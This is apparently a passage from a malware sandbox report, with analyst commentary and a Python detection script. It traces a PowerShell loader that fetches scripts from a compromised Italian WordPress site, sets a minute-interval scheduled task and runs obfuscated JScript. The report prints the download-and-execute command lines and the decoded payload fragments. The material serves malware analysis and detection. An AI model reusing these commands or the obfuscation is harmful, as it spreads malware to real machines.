                                        Dec 3, 2024 09:14:04.404956102 CET | 443 | 49731 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:04.407219887 CET | 49731 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:04.407237053 CET | 443 | 49731 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:04.951559067 CET | 443 | 49731 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:04.951633930 CET | 443 | 49731 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:04.951689959 CET | 49731 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:04.952214003 CET | 49731 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:09.562444925 CET | 49732 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:09.562500954 CET | 443 | 49732 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:09.562582016 CET | 49732 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:09.598328114 CET | 49732 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:09.598355055 CET | 443 | 49732 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:11.218771935 CET | 443 | 49732 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:11.218878031 CET | 49732 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:11.333153963 CET | 49732 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:11.333190918 CET | 443 | 49732 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:11.333523035 CET | 443 | 49732 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:11.396365881 CET | 49732 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:11.537473917 CET | 49732 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:11.579341888 CET | 443 | 49732 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:11.964740038 CET | 443 | 49732 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:11.964817047 CET | 443 | 49732 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:11.964876890 CET | 49732 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:12.025368929 CET | 49732 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:15:03.716892004 CET | 49751 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:15:03.716964960 CET | 443 | 49751 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:15:03.717103958 CET | 49751 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:15:03.719964027 CET | 49751 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:15:03.719984055 CET | 443 | 49751 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:15:05.195156097 CET | 443 | 49751 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:15:05.195292950 CET | 49751 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:15:05.197505951 CET | 49751 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:15:05.197515965 CET | 443 | 49751 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:15:05.197763920 CET | 443 | 49751 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:15:05.204862118 CET | 49751 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:15:05.247334957 CET | 443 | 49751 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:15:05.750233889 CET | 443 | 49751 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:15:05.750304937 CET | 443 | 49751 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:15:05.750402927 CET | 49751 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:15:05.774771929 CET | 49751 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:16:05.144076109 CET | 49887 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:16:05.144120932 CET | 443 | 49887 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:16:05.144285917 CET | 49887 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:16:05.147787094 CET | 49887 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:16:05.147809982 CET | 443 | 49887 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:16:06.625947952 CET | 443 | 49887 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:16:06.626046896 CET | 49887 | 443 | 192.168.2.4 | 46.254.34.201
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Dec 3, 2024 09:14:00.041531086 CET | 58267 | 53 | 192.168.2.4 | 1.1.1.1
                                        Dec 3, 2024 09:14:00.783628941 CET | 53 | 58267 | 1.1.1.1 | 192.168.2.4
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Dec 3, 2024 09:14:00.041531086 CET | 192.168.2.4 | 1.1.1.1 | 0x14c8 | Standard query (0) | www.italialife24.it | A (IP address) | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Dec 3, 2024 09:14:00.783628941 CET | 1.1.1.1 | 192.168.2.4 | 0x14c8 | No error (0) | www.italialife24.it | italialife24.it | - | CNAME (Canonical name) | IN (0x0001) | false
                                        Dec 3, 2024 09:14:00.783628941 CET | 1.1.1.1 | 192.168.2.4 | 0x14c8 | No error (0) | italialife24.it | - | 46.254.34.201 | A (IP address) | IN (0x0001) | false
                                        • www.italialife24.it
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.4 | 49730 | 46.254.34.201 | 443 | 7332 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-12-03 08:14:02 UTC | 113 | OUT | GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1
                                        Host: www.italialife24.it
                                        Connection: Keep-Alive
                                        2024-12-03 08:14:02 UTC | 253 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 03 Dec 2024 08:14:02 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Vary: Accept-Encoding
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-03 08:14:02 UTC | 18 | IN | Data Raw: 38 0d 0a 77 73 63 72 69 70 74 20 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii (chunked, CRLF shown): 8\r\nwscript \r\n0\r\n\r\n
                                        The body is a single 8-byte chunk, "wscript " with a trailing space, followed by the terminating zero-length chunk. The first-stage PowerShell decodes it with UTF8.GetString($cio) and prepends it to the dropped .js path to form the scheduled task's /tr action, so the server controls which interpreter the task runs. Note also that the WebClient request carries no User-Agent header.


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.4 | 49731 | 46.254.34.201 | 443 | 7332 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-12-03 08:14:04 UTC | 92 | OUT | GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1
                                        Host: www.italialife24.it
                                        2024-12-03 08:14:04 UTC | 253 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 03 Dec 2024 08:14:04 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Vary: Accept-Encoding
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-03 08:14:04 UTC | 316 | IN | Data Raw: 31 33 30 0d 0a 76 61 72 20 66 6e 6e 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 66 6e 6e 2e 52 75 6e 28 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 6d 61 6e 64 20 5c 22 49 57 52 20 2d 6f 75 74 66 69 20 24 65 6e 76 3a 70 72 6f 67 72 61 6d 64 61 74 61 5c 5c 56 35 38 57 30 39 44 41 4c 4a 45 4b 2e 6a 73 20 2d 75 73 65 62 61 73 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 61 6c 69 61 6c 69 66 65 32 34 2e 69 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 35 2f 61 66 72 65 74 50 66 2e 70 68 70 27 3b 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 22 20 2b 20 57 53 63 72 69 70 74 2e 61 72 67 75 6d 65 6e 74 73 28 30 29 20 2b 20 22
                                        Data Ascii (chunk size 0x130, then the body with its line breaks; preview truncated as captured):
                                        130
                                        var fnn = new ActiveXObject("WScript.Shell")
                                        fnn.Run("powershell -command \"IWR -outfi $env:programdata\\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + "


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.4 | 49732 | 46.254.34.201 | 443 | 7668 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-12-03 08:14:11 UTC | 202 | OUT | GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: www.italialife24.it
                                        Connection: Keep-Alive
                                        2024-12-03 08:14:11 UTC | 253 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 03 Dec 2024 08:14:11 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Vary: Accept-Encoding
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-03 08:14:11 UTC | 1300 | IN | Data Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                        Data Ascii (chunk size 0x508, then the body with its line breaks; preview truncated as captured):
                                        508
                                        var f1="Scr",f2="ing.Fi",f3="stemOb"
                                        var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")
                                        var w1="WSc",w2="riPt",w4="eLl"
                                        var wsh=w1+w2+".sH"+w4
                                        var bbj=new ActiveXObject(wsh)
                                        var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add
                                        The concatenations resolve to the ProgIDs Scripting.FileSystemObject and WScript.Shell (ProgIDs are case-insensitive, so the mixed case in "WScriPt.sHeLl" costs the script nothing); splitting them defeats plain string matching on the script body. The final statement queries WMI for the Win32_Processor instance, cut off at ".Add" in the capture.


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.4 | 49751 | 46.254.34.201 | 443 | 4588 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-12-03 08:15:05 UTC | 202 | OUT | GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: www.italialife24.it
                                        Connection: Keep-Alive
                                        2024-12-03 08:15:05 UTC | 253 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 03 Dec 2024 08:15:05 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Vary: Accept-Encoding
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-03 08:15:05 UTC | 1300 | IN | Data Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                        Data Ascii (chunk size 0x508, then the body with its line breaks; same payload as session 2, fetched again one minute later; preview truncated as captured):
                                        508
                                        var f1="Scr",f2="ing.Fi",f3="stemOb"
                                        var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")
                                        var w1="WSc",w2="riPt",w4="eLl"
                                        var wsh=w1+w2+".sH"+w4
                                        var bbj=new ActiveXObject(wsh)
                                        var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add



                                        Target ID:0
                                        Start time:03:13:57
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:1
                                        Start time:03:13:57
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:03:14:04
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
                                        Imagebase:0x7ff76f990000
                                        File size:235'008 bytes
                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:03:14:06
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
                                        Imagebase:0x7ff729c70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:03:14:08
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:03:14:08
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:03:14:11
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
                                        Imagebase:0x7ff76f990000
                                        File size:235'008 bytes
                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:03:14:11
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
                                        Imagebase:0x7ff729c70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true
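The process list above shows the full chain once: PowerShell (Target 0) downloads the verb and the script and registers the minute-interval task; schtasks (Target 2) creates it as ZA3XqiywQ; the task runs wscript (Target 3), which spawns PowerShell (Target 4) to fetch afretPf.php, delete the task and run the new script. The deletion never succeeds: the stage-2 JavaScript passes WScript.arguments(0) as the task name, but the first stage launched it as "wscript %tmp%\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js", so that argument is the script filename, not ZA3XqiywQ, and Target 6 runs "schtasks /delete /tn evQtmlDaSRMzUk.js /f" against a task that does not exist. The task therefore fires again (Targets 11 and 12 at 03:15:01, and the repeat fetches of afretPf.php at 09:15:05 and 09:16:05 CET). The detection below is an added example written for this page, not Joe Sandbox's own logic, run over constructed process-creation events in Sysmon Event ID 1 shape derived from the process list: PIDs 7332, 7668 and 4588 are the ones the HTTP sessions show, the remaining PIDs and all parent PIDs are made up, and the conhost.exe entries are omitted.

```python
"""Process-tree rules for the LNK -> PowerShell -> schtasks -> wscript chain, plus a
scheduled-task lifecycle check that catches a /delete whose name matches no /create.
Added example over constructed events; it is not code from the report."""
import re
from collections import namedtuple

Event = namedtuple("Event", "ts pid ppid image cmdline")

PS_HOSTS = ("powershell.exe", "pwsh.exe")
SCRIPT_HOSTS = ("wscript", "cscript", "powershell", "pwsh", "mshta", "cmd", "rundll32", "regsvr32")
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\programdata\\",
                 "\\users\\public\\", "%tmp%", "%temp%", "$env:tmp", "$env:temp", "$env:programdata")
DOWNLOAD = re.compile(r"(?<!\w)(downloaddata|downloadfile|downloadstring|invoke-webrequest|iwr|"
                      r"net\.webclient|start-bitstransfer)(?!\w)", re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
# Stage-2 PowerShell command as the report shows it (Targets 4 and 12)
STAGE2_CMD = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "'''

# Constructed events: command lines from the report, PIDs 7332/7668/4588 from the HTTP
# sessions, every other PID and all parent PIDs invented for the example.
EVENTS = [
    Event("03:13:57", 7332, None, PS, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;'''),
    Event("03:14:04", 7400, 7332, SCHTASKS, r'''"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ'''),
    Event("03:14:06", 7500, None, WSCRIPT, r'''C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js'''),
    Event("03:14:08", 7668, 7500, PS, STAGE2_CMD),
    Event("03:14:11", 7700, 7668, SCHTASKS, r'''"C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f'''),
    Event("03:14:11", 7800, 7668, WSCRIPT, r'''"C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js'''),
    Event("03:15:01", 7900, None, WSCRIPT, r'''C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js'''),
    Event("03:15:01", 4588, 7900, PS, STAGE2_CMD),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def schtasks_fields(cmdline: str) -> dict:
    """Extract the action and the /tn, /tr, /sc, /mo values from a schtasks command line."""
    low = cmdline.lower()
    action = "create" if "/create" in low else "delete" if "/delete" in low else None

    def opt(name):
        # value is either a double-quoted string or a single bare token
        m = re.search(r'/%s\s+(?:"([^"]*)"|(\S+))' % name, cmdline, re.I)
        if not m:
            return None
        return m.group(1) if m.group(1) is not None else m.group(2)

    return {"action": action, "tn": opt("tn"), "tr": opt("tr"), "sc": opt("sc"), "mo": opt("mo")}


def detect(events):
    """Return (alerts, tasks created but never deleted, deletes naming no created task)."""
    by_pid = {e.pid: e for e in events}
    alerts, created, deleted = [], {}, {}
    for e in events:
        img = basename(e.image)
        pimg = basename(by_pid[e.ppid].image) if e.ppid in by_pid else ""
        low = e.cmdline.lower()
        # Rule 1: PowerShell that downloads and registers a task in the same command line
        if img in PS_HOSTS and DOWNLOAD.search(e.cmdline) and "schtasks /create" in low:
            alerts.append((e.pid, "powershell downloads then registers a scheduled task"))
        # Rule 2: script host spawning PowerShell (wscript -> powershell)
        if img in PS_HOSTS and pimg in ("wscript.exe", "cscript.exe"):
            alerts.append((e.pid, f"{pimg} spawned powershell"))
        # Rule 3 + lifecycle: schtasks actions pointing a script host at user-writable paths
        if img == "schtasks.exe":
            f = schtasks_fields(e.cmdline)
            if f["action"] == "create":
                created[f["tn"]] = f
                tr = (f["tr"] or "").strip().lower()
                first = basename(tr.split()[0]) if tr else ""
                first = first[:-4] if first.endswith(".exe") else first
                if first in SCRIPT_HOSTS and any(p in tr for p in USER_WRITABLE):
                    alerts.append((e.pid, f"task {f['tn']} runs {first} from a user-writable "
                                          f"path every {f['mo']} {f['sc']}"))
            elif f["action"] == "delete":
                deleted[f["tn"]] = f
    orphaned = sorted(set(created) - set(deleted))      # persistence left behind
    unmatched = sorted(set(deleted) - set(created))     # deletes that could not have worked
    return alerts, orphaned, unmatched


if __name__ == "__main__":
    alerts, orphaned, unmatched = detect(EVENTS)
    for pid, msg in alerts:
        print(f"pid {pid}: {msg}")
    print("tasks never deleted:", orphaned)
    print("deletes with no matching create:", unmatched)
```

On these events the rules fire on PIDs 7332, 7400, 7668 and 4588, and the lifecycle check reports ZA3XqiywQ as created but never deleted and evQtmlDaSRMzUk.js as a deleted name that was never created, which is exactly the mismatch that keeps the task re-firing every minute in the sandbox run. Pairing /create and /delete by task name in this way is cheap on Sysmon or 4688 data and separates self-cleaning loaders from ones that, as here, leave their persistence behind.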

                                        Target ID:11
                                        Start time:03:15:01
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
                                        Imagebase:0x7ff729c70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:03:15:01
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:13
                                        Start time:03:15:01
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:14
                                        Start time:03:15:05
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
                                        Imagebase:0x7ff76f990000
                                        File size:235'008 bytes
                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:03:15:05
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
